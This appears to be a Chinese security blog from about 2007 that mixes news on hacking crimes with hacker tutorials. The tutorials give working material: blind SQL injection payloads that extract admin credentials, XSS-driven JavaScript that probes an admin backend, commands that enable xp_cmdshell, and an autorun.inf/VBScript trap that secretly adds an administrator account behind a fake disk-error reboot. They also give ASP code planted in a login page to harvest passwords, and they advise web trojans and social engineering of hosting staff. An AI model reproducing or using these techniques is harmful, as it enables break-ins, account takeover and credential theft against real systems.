
  中国网络反黑缺什么?

  在公众视野里,黑客犯罪带来的网络安全忧虑丝毫没有缓解。

  首先是,普通网民安全防范意识不高,许榕生说,即便在高能物理所这样的科研单位,计算机中毒或受攻击也时有发生。

  周帅告诉南方周末记者,黑客攻击,需要的只是一个漏洞,“一着不慎,往往全网皆输”。

  提高网民的安全防范意识,看似非一日之功,而完善既有的打击和威慑机制,似可始于足下。

  有法律专家指出,中国既有刑法虽然增设了计算机犯罪条款,但条款只针对违反国家规定,侵入国家事务、国防事务、尖端科学技术领域的计算机信息系统规定为犯罪,其范围过于狭窄。

  尽管2000年的《全国人大常委会关于维护互联网安全的决定》又对侵入个人、企业及其他组织计算机系统的行为进行了司法鉴定,但比照的是刑法其 他一般罪责条款。专家建议,只要是未经许可(或未具备相应的职权)非法侵入的,不管其对象是国家核心部门的系统,还是普通公民的个人系统均应按“非法侵入 计算机信息系统”定罪量刑。

  其次,既有相关法律中对于侵害信息系统犯罪的定刑刑种单一,难以发挥刑罚的惩戒功能。

  深圳网监局在打击计算机犯罪中已经遭遇司法难题,比如“网络钓鱼”所盗取的类似QQ币等虚拟货币,如何评估其价值,法律无相关规定。

  此前,该局曾破获一起盗窃QQ币的团伙作案,QQ近亿元,因为定性困难,不能以盗窃罪论处,最后是以破坏通讯设施和秩序论处。

  事实上,中国目前的网监部门还依照传统的省市县层层设立,以属地管理为界,造成管控分散,难以适应黑客犯罪日益跨区域化的特征。

  “到了地方县一级,即使有网监部门,也往往人力、财力、技术不足,对于网络安全起不到实质保障作用。”该局一名官员说。

  此外,许榕生对中国网络安全人才培养模式和任用机制表示了忧虑。

  在国家一些很重要部门,“要留住一两个网络高手谈何容易?这些人才流动性很强,环境与待遇都是现实问题。如果这些‘网络卫士’都没有安顿好的话,你的网络由谁来保护呢?”

  而法律和计算机复合型人才更是奇缺。“国外有些大学的计算机系专门增添了法律课程,定向培养计算机取证人才,我正在推动国内的大学做试点。”

  我们的政府网站呢?

  “中小企业最容易,政府居中,银行最难。”黑客Angel kiss对南方周末记者如此排序入侵难度。

  今次外国政府网站被攻击事件,自然衍生的担忧是,中国自己的政府网站安全性如何?能否应对来自异国的黑客攻击?

  截至目前,中国各级政府网站实施“两网一站”建设,即外网、内网和门户网站的架构。

  “外网主要传输可以公开的一些业务信息,而内网则传输一些不涉秘密的内部文件,要求与互联网实行物理割断。而最重要的机要秘密文件则由安全要求更高的机要网来承担。”洛阳市信息中心官员向本报记者介绍。

  就全国而言,公安、税收、财政等纵向系统都有专门的安全工程确保内网安全,比如金盾工程,“但在横向上彼此联结不够”。

  “最终地方的信息安全还是取决于地方重视程度和安全意识。”这位官员举例说,洛阳某区的政府网站被黑客攻击,检查后才发现,当地技术人员不按规范,连防火墙设备都没有安装,以裸网面目敞开,当然容易受攻击。

  国家已对各级地方网络实行了5级等级保护制度。“但政府既有的惯性往往都是重硬件,轻管理,有设备不用,不常用,当然也有安全投入和人手技术储备的问题。”

黑客入侵大学网站 收费修改学分

出处:新京报

  本报讯 “黑客”入侵四川多所高校的计算机学生管理系统,篡改学生学分档案,并办地下工厂,制贩毕业证等牟取暴利。近日,疑犯李杰华、吕斌等3人被绵阳警方逮捕。

  今年5月15日,省内某师范学院保卫处人员到绵阳市公安局报案:从去年8月至今年4月,该学院教务管理网络系统被黑客侵入,130余名学生多达302科学习成绩被改动。据了解,该学院学生杨某、高某等从去年8月至案发前,分别联系需修改学分的学生,按60元、70元、100元每学分不等的价格收取费用,交由一QQ昵称为“摆解轰”的人,由其非法进入教务处学生成绩管理系统,对学生成绩进行修改,非法获利达4.23万元。

  警方随即成立专案组,并将李杰华、吕斌等人抓获。

  据调查,24岁的吕斌系新疆人,父亲是某矿业集团铝业公司的总经理,年入10多万元。吕斌在四川某大学期间成绩优秀,被称为电脑天才。2005年,吕斌认识李杰华后,两人决定制贩假文凭。2006年8月,李杰华找吕斌要求为学生杨某改学分,吕斌完成。

  杨某、高某等先后成为李杰华的下线,为其寻找需要改学分的同学。下线以每修改一学分60元至100元价格进行收费,再向李杰华交纳每学分50元的“管理费”。据调查,从去年5月至案发,李杰华通过从吕斌处学到的技术,入侵一些高校的网络,修改学分、制贩假学位证等,非法获利20余万,而吕斌仅获8000元。

《北京日报》:网络侵财犯罪出现17岁现象

北京市朝阳区检察院近期受理了数起通过网络窃取财物的案件,检察官发现:在这类犯罪中,17岁的青少年嫌疑人增多,比例占到了一半以上.

我国法律明文规定严禁未成年人进入网吧,但在朝阳区检察院统计的网络侵财犯罪中,嫌疑人犯罪场所多集中在网吧.近日,17岁的张阳因盗窃网吧账号、密码,为自己的游戏账号充值,被朝阳区检察院提起公诉.他十分懊悔,反复向检察官说:“都是网络游戏害了我!”

  迷恋网络游戏“梦幻西游”  猜出网吧密码“免费”玩

  张阳(化名)经常在朝阳区某网吧玩网络游戏“梦幻西游”.他偶然发现网吧工作人员输入这个游戏的注册账号和密码,便记下输入时的手型.张阳反复试验,终于猜对了.极度兴奋的张阳,开始为自己的游戏账号充值,给人物升级,享受“免费”游戏;同时,他还不忘给朋友和同学们的游戏账号充值.张阳的行为引起了网吧工作人员的注意并报了案.

  经调查,从开始作案到案发,张阳已盗窃了网吧价值两千多元的游戏点卡.

  检察官提示

  针对一些未成年人强烈的网瘾,相关部门应采取更切实可行的方法,引导喜欢网络的青少年走向健康的方向;还要对网吧实施更严格的监管.

  保安员蒙对银行卡密码  网上银行盗钱1.8万元

  朝阳区检察院调查发现,从2006年至今,在网络侵财型犯罪中,有50%以上都是通过窃取用户网上银行的账号和密码,来占有他人钱财.

  17岁的史明(化名)在北京某银行担任保安员.一天,他在拨打银行自动语音查询系统时发现,如果输入8位的“档案号”,就可以反蒙到12位银行卡的卡号.他动起了歪脑筋,想试试运气,就“坚持不懈”地进行输入、查对,居然还真得到了几张银行卡的信息.但没有银行卡,无法取出现金,他想到了利用网上银行转账的方法.

  史明到附近的网吧去“试验”.他先将自己“蒙”来的卡号和密码,输入网上银行进行验证,发现能看到其中两人的账户信息,原来这两人的网上银行密码和电话查询密码是相同的.于是,他毫不费力地将这两人在网上银行内的钱转到自己账户中,共窃取了一万四千余元.

  检察官提示

  就本案而言,史明并不具有计算机专业技能,得以利用网络窃钱,一方面具有一定的偶然性,另一方面也反映出电话银行、网上银行等系统,需要加强系统维护、完善配套措施建设;网上银行用户要增强防范意识,不要将网上银行密码和电话查询密码设为一样的数字,避免密码被破解.

  受到网友不良影响贩卖盗窃的游戏卡点

  检察官通过询问一些犯罪嫌疑人发现:一些掌握了大量计算机和网络知识的专业人员,通过从事高智商的网络犯罪活动,一方面获取钱财,另一方面也获得了对网络空间入侵和破坏所带来的成就感.一些青少年容易受影响,追随比自己“高明”的人.

  17岁的小穆(化名)在网吧网上聊天时,认识了某大学计算机专业学生小林(化名).小穆由于经济窘迫向小林求助,没想到小林慷慨地给小穆汇来1000元钱,并告诉他:“这钱是从别人的网上银行里盗取的.”原来,小林在网站上发布了一种叫“灰鸽子”的病毒,一旦有人登录有病毒的网站,其电脑就会中毒,而 “灰鸽子”则会远程监控中毒的电脑,然后小林再伺机窃取对方网上银行的账号、密码和银行证书.

  通过这种方法,小林将张先生在网上银行卡内的48万余元盗走,转账到了两个网站上,并购买了30多万元的游戏点卡.而17岁的小穆,则辅助小林将这些点卡在网上低价销售获利.

  近日,朝阳区人民检察院以盗窃罪,批准逮捕了犯罪嫌疑人小林和小穆.

  检察官提示

  检察官建议人们:上网时及时更新杀毒软件;不要登录不健康网站和来历不明的网站;有关部门应对网站加强管理,同时针对网络从业人员进行职业道德教育和法治教育,避免其误入歧途.

窃取用户虚拟财产 黑客利用网络游戏赚钱

来源:赛迪网 作者:天虹

在线游戏最近几年已经成为诈骗的主要攻击目标。卡巴斯基实验室9月11日发表的一篇研究报分析了黑客“轻松赚钱”的技术和攻击目标。黑客利用这些技术在黑市销售窃取的用户登录证书或者游戏内的虚拟物品。

卡巴斯基病毒分析师Sergey Golovanov在题为“在线游戏与诈骗:使用游戏做诱饵”的研究报告中简要分析了在线游戏中的安全漏洞、用来窃取保密的玩家数据的方法和保护这些数据的方法。

Golovanov说,网络黑客使用三种主要的方法消除在线游戏的口令:社会工程学(钓鱼攻击、或者假冒提供奖品或者游戏秘技引诱用户登录恶意网站)、利用游戏服务器安全漏洞、使用恶意程序获取口令。这篇研究报告提供了在游戏中的木马程序数量统计以及哪些在线游戏是流行的攻击目标。

最新的木马程序一般都采用使用Delphi语言编写的一个动态连接库。当检测到用户启动在线游戏程序时,这个程序能够拦截通过键盘输入的口令,然后把口令发送给恶意用户的电子邮件地址,然后把自己删除。

这篇报告称,90%以上攻击在线游戏的木马程序是在中国编写的。这些恶意程序窃取的口令有90%是属于韩国网站的游戏玩家的。

这篇报告称,40%以上的攻击在线游戏的木马程序是攻击《天堂2》游戏的。《魔兽世界》是第二个最流行的攻击目标,占木马程序的20%。Golovanov说,那些依靠窃取虚拟物品生活的人几乎不会受到法律的制裁。游戏开发商应该与杀毒公司合作解决这个问题。用户也需要利用常识保护自己的在线秘密资料。

假是真时真是假——or注入教程

假是真时真是假——or注入教程

文章作者: 落叶纷飞 & 华夏鸡头4 [S.S.T]

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

PS:很久的文章了,07年4月的,最近找到修改了下就发上来,文章有些乱,请大家不要见怪

记得一年前火狐有一位朋友问,如果一个站过滤了and和“'”的话,改怎么注入啊?当时我随口说了句“or注入”,后来又一次看贴的时候,看到他问我该怎么利用呢?我就写了几个简单的语句给他,叫他自己变换,他很感激我,还说网上没有这种方法。我到网上查了查,还真没有or注入专题呢(or 1=1除外),呵呵,所以,一年后的今天,就有了这篇文章。

我们用雷霆购物系统做or注入演示。我们先用or 1=1和or 1=2来测试是否存在注入点,我们先来看正常页面的面貌。我们现在用or 1=1测试是否存在注入漏洞。返回的是另外一个页面,我们再来测试or 1=2。返回的是正常的页面,说明猜测正确的时候是错误,猜测错误的时候是正常,这就是真正的“假是真时真是假”,比lake2大哥哥的IP欺骗更经典哦,呵呵。

我们来构造测试语句:

vpro.asp?id=1 or exists(select * from admin)

返回错误页面,说明存在admin表我们来换一个表试试!

vpro.asp?id=1 or exists(select * from n0h4ck)

说明不存在n0h4ck这个表。

我们继续来,构造语句

vpro.asp?id=1 or exists(select admin from admin)

返回or 1=1的页面,说明admin表存在admin字段。

vpro.asp?id=1 or exists(select padd from admin)

返回or 1=2的页面,说明admin表不存在padd字段。

我们现在开始猜测数据了,

vpro.asp?id=1 or (select mid(admin,1,1) from admin)='n'

返回or 1=2的页面,说明admin表admin字段的第一个数据的第一个字符不是“n”。

我们再来

vpro.asp?id=1 or (select mid(admin,1,1) from admin)='a'

返回or 1=1的页面,说明说明admin表admin字段的第一个数据的第一个字符是“a”,我们第一个会想到什么呢?当然是“admin”啦。

我们用left函数确定一下,

vpro.asp?id=1 or (select left(admin,5) from admin)='admin'

猜测正确,的确是admin,好了,后面的话就不用我说了吧!

Sql-injection In Xss[SIX]
文章提交:HeiGe (hack-520_at_163.com)

SIX存在的意义:
1、有权限限制的地方总是让人比较放心,比如后台、内网 .... 。而且有的程序官方否认后台漏洞的危险,比如*vbbs对以前那个数据备用得到shell的态度。的确,在权限的限制下,这样的漏洞很难直接被利用。 Xss就和上面的情况一样,也经常被程序员忽视,而且也不太好防,如果2个情况配合起来,那就意味着利用的难度将大大下降...
2、然后有的人会说xss攻击完全可以通过"劫持"cookie,直接继承权限:比如直接登陆后台。确实这是个好方法,但是有的后台现在都是直接和ip邦定。所以我们可以利用xss直接自动完成后台的一系列攻击如Sql-injection。
3、对于公开程序,你可以根据htm/js代码来自动实现你要攻击的后台的功能,但是如果是完全黑盒的呢?

SIX的原理:
1、利用流程图
hack----------->前台+++++++>+
^ +
| +
后台<++++++<+
^
|
管理员------------
2、xmlhttp让你的代码悄悄执行:
luoluo哥哥写的《XmlHttp的简单封装》的codz:http://pstgroup.blogspot.com/2007/08/javascript.html

SIX的利用:
1、得到后台的url的code:

var xmlhttp = new XmlHttp();
if (xmlhttp.init()) {
xmlhttp.get("http://localhost:808/index.php", function(s) {
//通过管理员登陆前台的,列遍所有连接来查找后台 比如得到admin/index.php
var re = new RegExp("<a href=\"([^\"]*)", "ig");
var m = null;
while ((m = re.exec(s)) != null) {
alert(m[1]);
SendUrl(m[1]);//实际中你还要写个函数发送这个数据并且保存,注意这里不可以用xmlhttp发送,因为xmlhttp不可以跨域。
}

});
}

2、列遍后台连接扫描注射点的code:

var xmlhttp = new XmlHttp();
if (xmlhttp.init()) {
xmlhttp.get("http://localhost:808/admin/index.php", function(s) {
var re = new RegExp("<a href=\"([^\"]*)", "ig");
var m = null;
while ((m = re.exec(s)) != null) {
var xmlhttp = new XmlHttp();
if (xmlhttp.init()) {
xmlhttp.get(m[1]+"'",function(s1){
if (s1 != null) {
alert(s1);
SendUrl(s1);
}
});}
//alert(m[1]);
}

});
}
这个只是简单的在连接后面加个'探测。

3、得到后的攻击的code:缺

上面的代码写的很粗糙,如果你要做完整还需要做很多事情。 :)

SIX内网:
很多内网的web在外网是没有办法访问的,如果我们要SIX内网,首先我们要解决的问题是跨域问题:
1、img iframe script 等可以跨域。
2、xmlhttp不可以跨域,但可以配合某些跨域漏洞。

步骤:
(1)、端口扫描
Javascript Based Port Scanner : http://www.securiteam.com/exploits/5DP010KJFE.html
flash port scanner : http://scan.flashsec.org/classes/Main.as
(2)、扫描列遍url并扫描注射点、攻击
这个如果利用html了的img iframe script 等是比较难实现的,但是如果利用上面的xmlhttp的代码又不可以直接跨域,所以必须配合某些跨域漏洞[其中寻找Activex的跨域,是个很好的方向?]
(3)、Overflow in Xss[OIX]:(这个是题外话):如果我们可以跨域,那么我们可以利用xmlhttp直接溢出内网的ftp/http等服务器,当然利用img iframe script 等也可以溢出http/ftp服务器一些url的溢出。要看具体情况了

最后:感谢luoluo牛:我是你的fans,我顶你!

SQL2005开启选项的一些方法整理


sql server 2005下开启xp_cmdshell的办法

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

SQL2005开启'OPENROWSET'支持的方法:

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;

SQL2005开启'sp_oacreate'支持的方法:

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;

星期三, 九月 12, 2007

活地运用SQL Injection做数据库渗透

无法查看这则摘要。请 点击此处查看博文。

另类巧妙的思路:旁门左道的入侵

BY 剑心[B.C.T]

很多的时候,入侵并不是单纯靠技术的,有很多是运气因素,更重要的是如何对一些摆在你面前的一些安全破绽的攻击。我很相信安全意识这个东西,当一台服务器摆在你面前时,大概的看下就知道服务器的安全到底如何了,特别是对于入侵之后的webshell的提升,更多的依赖于管理员的安全意识。由于本人的技术不好,不能自己发现溢出漏洞,所以在入侵时只能搞些旁门左道的东西了。也许这些都是被管理员和高手所不耻的,但是在实际中,这些伎俩的威胁不容忽视,你根本不知道什么时候你的系统就会变得到处是陷阱,加上安全意识薄弱一点的话,对系统的危害还是很大的,我就来说说我平时用到的一些旁门左道的方法吧!(大家以后不要鄙视我就行了^_^)

首先我们获得一个webshell,因为我说的旁门左道主要就是用在得到webshell之后的权限提升,webshell相信大家手里都有一大把吧!没有也没有关系,脚本漏洞那么多,看看以前的文章自己上网找找吧!^_^。得到webshell以后,我一般都是先看看系统的进程列表,砍客的木马和最近的海洋木马都有这个功能。我用的就是海洋的修改版,可以看到很详细的信息,你没有这样的木马的话也没有关系,我这里有别人给我的一段代码,放到服务器上就可以看进程了:

<%

dim obj //定义变量//

for each obj in getObject("WinNT://.") //循环取得系统本机对象//

err.clear //错误处理//

%>

<%=obj.Name%> //显示对象Name属性,即显示系统用户组//

<%if err then

else

%>(<%=obj.DisplayName%>)<%end if%> //显示当前服务名//

<br><%=obj.path%> //显示当前服务程序路径//

保存为asp文件访问看看吧!如图一。这里要仔细看看,服务都装在哪里,还有哪些服务,这样就可以知道管理员的水平到底怎么样了。如果你什么也没有得到的话说明管理员不是很差劲,就要小心了!呵呵,服务都装在默认的路径下啊,默认Guest没有什么权限,不过如果你发现有不在默认路径下的服务,就试着执行命令看看,可以执行的话就可以把我们自己的程序传上去改掉服务的名字,将自己的程序替换成他的(这里要求对方的程序路径下是默认的权限哦)。windows默认是不允许删除正在执行的文件但是可以改名,呵呵,这里只要服务器重起我们的程序就可以执行了,当然是以牺牲对方的服务为代价的了,建议搞瑞星之类的杀毒软件。这里因为是要等服务器重起,但是一周左右都会重起的,概率很大,windows太不稳定了。呵呵,阴险吧,一切都是为了权限,不然怎么叫旁门左道呢?如果你真的比较性急,我也不建议你跑去D人家,是托管主机的话直接冒充管理员让托管机房的人重起比较好,成功率据说很高的啊!前提是你要十分了解对方。当然,如果机器有Server-u并且版本比较低的话就不用那么麻烦了,如何提权就看看以前的文章吧,我就不多说了。但是看看这里,我们的情况不怎么好,看看服务的路径就知道,就是几个防火墙和杀毒软件,全部默认啊,可以执行命令也没有办法替换服务了。我们再看看,好多默认的服务都没有关,这是一个对安全重视的网管所不会做的,至少那个什么ClipBook服务就是个例子(排除对自己超级自信的网管!)。可以看出他的安全意识至少不是那么到位,我们肯定有空子可以钻的,哈哈!接着往后看吧,用Fso查看磁盘发现都可以浏览,还可写,看来都是默认的设置,还可以执行命令,网管果然比较$#%$@$#%啊!其实开始我就应该知道,因为他的web页面和数据库都是默认设置,我就是那样得到webshell的!基本可以确定我们的对手是怎么样的一个人了!呵呵。

但是好象还是没有什么用,可以执行命令,将nc传上去还可以得到了反向的cmdshell,乱转悠但还是没有什么思路!管理员不懂做安全配置但是微软的补丁不知道为什么打得很全,本地的溢出都不好用!郁闷。那就再在他的硬盘里看看,嘿嘿,根目录可写啊,想起什么了?记不记得系统默认的那个autorun.inf啊,放在磁盘根目录,双击的话会执行那个指定程序的呵,我们就放个autorun.inf上去,哈哈。如图二。这样他的硬盘下就有我们放置的陷阱了,等管理员来了。当然,不能直接用autonrun.inf运行我们的木马,这样管理员打不开硬盘一定会奇怪的,我写了个隐蔽点的代码:

Dim fso, MyFile //定义变量//

Set fso = createObject("Scripting.FileSystemObject") //取得Fso对象//

Set MyFile = fso.GetFile("d:\autorun.inf") //打开文件d:\autorun.inf//

MyFile.delete //删除文件//

dim sh //定义变量//

set sh=createobject("wscript.shell") //创建对象//

sh.run "net user jnc lxfxd /add",0 //Wsh执行命令添加帐户jnc//

sh.run "net localgroup administrators jnc /add",0 //将jnc帐户加为管理员//

sh.run "attrib +h +s d:\run.vbs",0 //将我们的run.vbs加上系统隐藏属性//

sh.run "shutdown -r -t 30 -c windows读盘错误,需要重新启动以读取分区表.",0 //重起机器,后面的是迷惑管理员//

保存为run.vbs,与后面的autorun.inf设置为隐藏之后一起放到磁盘根目录下。如果是2000,可以把shutdown.exe传上去,这些代码的意思是先删除autotun.inf,然后加jnc为管理员,最后弹出对话框,机器重起,重起后什么痕迹都没有了,除了多个管理员用户。提示信息可以自己改,迷惑性越大越好!在autorun.inf里写上下面的代码:

[autorun]

OPEN=wscript run.vbs

一定要是wscript.exe啊,不然有黑的对话框出来就麻烦了。应该有高手知道如何用脚本打开磁盘的,但是我不会写,不过这样已经够狠的了,想想现在有哪个打开磁盘时不是双击啊!

除了这个,还有个东西很值得提下,就是以前的黑x介绍的那个目录欺骗工具,管理员误以为是文件夹就可以加帐户的那个。不过我得到的程序运行程序成功后总有个bat文件,删不掉,是人都看出来有鬼!我就不要运行程序的功能了,直接传到管理员去得多的地方,嘿嘿,根目录下放一个,网站目录放一个,……。如图三,也不要太多了,放到管理员眼皮底下等他运行就可以了,我是不知道如何编程啊,不然写个名字诱惑性更大的程序效果更好。我们有帐户又有可以执行命令的cmdshell,没有3389也可以用runas命令啊,这机器就是我们的了!可是这样安全意识的管理员一般很懒,不一定会经常上线,不然不会这么多漏子。嘿嘿,不要着急,等什么都弄完了再想法让他上线检查自己的电脑,这样才可以运行我们的程序。

再找找其他有不有空子可以钻。去看看他网站上有什么东西吧,他这样的管理员各个地方用的密码不会都不一样吧?网站上有个动网sp2的,把数据库由asp的copy成mdb的下载下来看看。在Dv_log里没有找到密码,看到了注册时间最早的那个家伙(这个当然就是管理员了自己!)的密码,拿下来跑跑。可是半天也没有跑出来啊,急!我破解不出来我还不会等着你往我家里送啊?干脆找到了bbs的login.asp在里面加了点东西:

<%

dim Name,password,fso,file //定义后面要用到的变量//

Name = Request("username") //取得浏览器传过来的username变量//

Password = Request("password") //取得浏览器传过来的Password变量//

Const ForReading = 1, ForWriting = 2, ForAppending = 8 //定义后面写文件的参数//

Set fso = Server.createObject("Scripting.FileSystemObject") //取得Fso对象,准备写文件//

Const path = "D:\mir3\bbs\admin_list.asp" //定义要写的文件路径//

set file=fso.opentextfile(path, ForAppending, TRUE) //取得文件对象//

file.write(Name) & " " //写取得的用户名//

file.write(Password) & "||" //写取得的密码,并用||分隔开//

file.close //关闭文件//

set file = nothing //释放变量//

set fso = nothing //释放变量//

%>

注意的是里面request的变量,具体的字段自己改!还有后面你要存放的文件地址,这个也根据情况自己填了,以后经常来看看得到的东西就行了,我比较关注的是admin!如图四。又一个个陷阱挖好了,等管理员钻了。可是好象不知道他什么时候登陆呢,我干脆去当会坏人,发了几个人身攻击的帖子,灌了一会恶意的水就不信你管理员熬得住不上来删帖子!(不是我的本意,大家原谅!)嘿嘿

再转悠了几下子,发现C:\Program Files下有3721,乖乖,难道服务器还有人拿来上网啊?不过也不排除那种可能,二话不说,找人要了最新的网页木马的代码,找网站几个关键的页面插进去,如图五哈哈,又是一个陷阱,只要你打开Ie上网!再找找,发现这个管理员还好,服务器上不聊QQ,也没有什么游戏,要不然我们又可以给他捆上个东西,捆什么?当然是木马了!我还真遇到有人在服务器聊QQ玩连连看外加看少儿不易的东西,呵呵,这样的机器要是还搞不定就真是你的问题了。

这个机器上基本上已经到处是陷阱了,只等管理员上线了,我可等不急了,催催他吧!拿出经典的黑站图片,插入网页木马在里面替换主页黑了他!(这里我了解管理员的水平所以这么做的,大家千万不要模仿!)就等他发现了,我们的陷阱可是在等他的啊!可是这个网站好象人气不怎么好,等了半天也没有人清除黑页。算了,中招是迟早的事了,你要是没有耐心在网站上找下他的QQ告诉他,注意社会工程学的应用啊,呵呵。

这里还要说点其他的,得到webshell和权限有更好的办法,上那个可以查询网站信息的站点,http://www.webhosting.info查询下他的信息,如图六,注册个相似的邮箱,或者直接打电话,然后冒充下站长说自己的密码丢了,偶不怎么擅长这个,所以都是听人家说的,可是上次跟小默上电信机房发现那里检查真不是怎么严,签个名就让进去,进去之后还什么都不管。一些服务器就那样开着,管理员已经登陆但是人不在,还有一些很重要的服务器都可以直接操作的,真不知道放个马到网关上去会怎么样,这里说的东西或许有些偏离黑客的技术了,但是,你敢保证这些旁门左道不会威胁到你的主机的安全?意识很重要,安全再怎么小心都不为过,好了,我就说到这里,有什么问题可以到在杂志补充或者论坛讨论,我的ID是剑心。

星期二, 九月 11, 2007

灰鸽子始终未停止与杀毒软件对抗

灰鸽子始终未停止与杀毒软件对抗

出处:新浪科技

  近日,细心的读者可能发现由各大杀毒厂商发布的每日病毒预警中,灰鸽子变种依旧很活跃;而就在近段时间,上海计算机病毒防范中心也连续两次发布了灰鸽子新变种的预警信息。一时间,灰鸽子卷土重来的声音再次响起,一些用户也开始担心是否会遭遇灰鸽子的侵害。

  王先生是一位淘宝商家,一提到灰鸽子确有谈虎变色之意。“前几天,看到一则新闻,一个淘宝用户的电脑被植入了灰鸽子,结果18万不翼而飞。而近日,有消息称灰鸽子变种非常多,所以我感到非常害怕,不知道该如何防范。”

  金山毒霸反病毒专家戴光剑表示,“其实灰鸽子从未停止与杀毒软件的对抗。而这种对抗主要是技术层面的对抗。一边杀毒软件在不断升级病毒库、专杀工具以及一些病毒免疫措施,而灰鸽子也在不断研究如果破解决杀毒软件的查杀,进而新变种频繁出现。”

  据了解,3月份,金山首个掀起了围剿灰鸽子的大旗,人们开始逐步认识到灰鸽子木马的危害,迫于压力,灰鸽子工作室正式关闭,围剿灰鸽子的行动取得阶段性胜利。但由于灰鸽子所能够带来的丰厚的经济利益,一些灰鸽子的余党仍然活跃于各大论坛,不断推出新的变种以供一些图谋不轨的人使用。

  金山毒霸反病毒专家特别强调,虽然灰鸽子变种依旧很频繁,但并没有达到大规模爆发的迹象,用户也无须过分担心,对付灰鸽子木马全面的防范至关重要。

安全专家利用Tor获取大量政府E-Mail密码

不要以为Tor是很安全的访问方法,其实它比普通的互联网络范围更小,更容易拦截.

上个月,瑞典安全研究人员 Dan Egerstad 从著名的路由软件Tor上获取到了多达100个E-Mail账户和密码信息,其中绝大多数来自政府的服务器,其实他只是简单地在几个伪造的节点上安放了几个包过滤器,非常容易地分离出了大量明文信息.

Tor这种通过节点之间路由访问的方法已经让研究人员感到警觉.

就在前几天,Tor网络上还出现了蠕虫病毒,在您戴Tor上网的时候请千万注意不要传送您的私密信息,因为这一切都很可能被截取.

认为WGA程序威胁消费者信息安全 北大学生告微软侵权

记者今天获悉,北京大学学生陆峰起诉美国微软公司、微软(中国)有限公司一案,北京市第一中级人民法院已立案受理.

陆峰是北京大学的法律硕士.他在购买了一台预装Windows XP操作系统的笔记本电脑后,发起了国内第一起针对微软“Windows正版增值计划通知” 程序KB905474的起诉.他认为这一程序严重威胁了他的个人信息安全和隐私,侵害了他的消费者权益和财产权益.

陆峰在起诉书中称,根据WindowsXP系统自动更新的警告,他在笔记本电脑上安装了“Windows正版增值计划通知”程序KB905474.据介绍,该程序的目的是验证原告计算机所装的WindowsXP操作系统是否为正版软件.该程序将在原告计算机内永久存在,被告可以定期运行该程序;且该程序将收集到的原告计算机信息和个人信息,通过INTERNET发送给被告,被告可以与第三方共享这些信息.

陆峰认为,“Windows正版增值计划通知”程序KB905474对他计算机信息安全和个人隐私造成了重大威胁,并对其计算机所有权的行使造成了妨碍.并且在他安装上述程序的过程中,被告以格式合同的形式排除了他的合法权利,对他做出虚假陈述,且隐瞒重要事实,违背了被告应尽的提示告知义务,侵犯了原告作为消费者和最终用户应享有的合法权益.

此外,在安装完该程序后,被告确认原告的操作系统为正版软件.但是,原告在被告官方网站上无法下载被告承诺的正版升值服务.因此,原告根据被告的提示,在其官方网站上下载了另外一个验证操作系统版本的检测工具软件.而该软件在运行过程中没有向原告做出任何提示或说明,直接得出了检测结果.被告的该检测工具软件严重侵犯了原告的知情权和选择权.

原告因无法解决下载正版升值服务的技术问题,只好通过被告网页的指引,向被告寻求技术支持.但是被告利用其在市场和技术上的垄断地位,向原告提出了显失公平的技术支持收费条款.根据被告官方网站的技术支持网页上的陈述,如果原告要向被告寻求技术支持,解决原告计算机不能下载被告升值服务的技术问题,原告须向被告支付技术服务费300元.“被告300元的技术支持收费条款违反了我国价格法第七条的规定,实际上剥夺了我合理获得被告技术支持服务的权利.”陆峰说.

陆峰请求法院撤消被告与原告订立的本案诉争程序的安装许可协议,判令被告删除获取的原告计算机信息和个人信息,判令被告向原告公开其获取原告的信息,禁止被告在任何场合下以任何目的、任何方式使用其获取的上述信息;请求法院判令被告提供卸载工具,卸载其安装在原告计算机上的诉争程序.陆峰还请求法院判令被告在全国发行的报纸上公开向原告赔礼道歉,并撤消被告技术支持服务中显失公平的收费条款,责令被告以公平合理方式向原告提供技术支持服务,赔偿原告1350元费用等.

陆峰接受记者采访时说:“我希望通过这个诉讼,能对维护国家和广大微软系统用户的利益,做出些微小的贡献."

MSSQL数据库SA权限入侵的感悟

无法查看这则摘要。请 点击此处查看博文。

黑客应掌握的基本技能

一、了解一定量的英文:

学习英文对于黑客来说非常重要,因为现在大多数资料和教程都是英文版本,而且有关黑客的新闻也是从国外过来的,一个漏洞从发现到出现中文介绍,需要大约一个星期的时间,在这段时间内网络管理员就已经有足够的时间修补漏洞了,所以当我们看到中文介绍的时候,这个漏洞可能早就已经不存在了。因此学习黑客从一开始就要尽量阅读英文资料、使用英文软件、并且及时关注国外著名的网络安全网站。

二、学会基本软件的使用:

这里所说的基本软件是指两个内容:一个是我们日常使用的各种电脑常用命令,例如ftp、ping、net等;另一方面还要学会有关黑客工具的使用,这主要包括端口扫描器、漏洞扫描器、信息截获工具和密码破解工具等。因为这些软件品种多,功能各不相同,所以本书在后面将会介绍几款流行的软件使用方法,学习者在掌握其基本原理以后,既可以选择适合自己的,也可以在“第二部分”中找到有关软件的开发指南,编写自己的黑客工具。

三、初步了解网络协议和工作原理:

所谓“初步了解”就是“按照自己的理解方式”弄明白网络的工作原理,因为协议涉及的知识多且复杂,所以如果在一开始就进行深入研究,势必会大大挫伤学习积极性。在这里我建议学习者初步了解有关tcp/ip协议,尤其是浏览网页的时候网络是如何传递信息、客户端浏览器如何申请“握手信息”、服务器端如何“应答握手信息”并“接受请求”等内容,此部分内容将会在后面的章节中进行具体介绍。

四、熟悉几种流行的编程语言和脚本:

同上面所述一样,这里也不要求学习者进行深入学习,只要能够看懂有关语言、知道程序执行结果就可以了。建议学习者初步学习C语言、asp和cgi脚本语言,另外对于htm超文本语言和php、java等做基本了解,主要学习这些语言中的“变量”和“数组”部分,因为语言之间存在内在联系,所以只要熟练掌握其中一们,其他语言也可以一脉相同,建议学习C语言和htm超文本语言。

五、熟悉网络应用程序:

网络应用程序包括各种服务器软件后台程序,例如:wuftp、Apache等服务器后台;还有网上流行的各种论坛、电子社区。有条件的学习者最好将自己的电脑做成服务器,然后安装并运行一些论坛代码,经过一番尝试之后,将会感性的弄清楚网络工作原理,这比依靠理论学习要容易许多,能够达到事半功倍的效果!

非主流入侵之会话劫持winnt/2k HASH

声明:

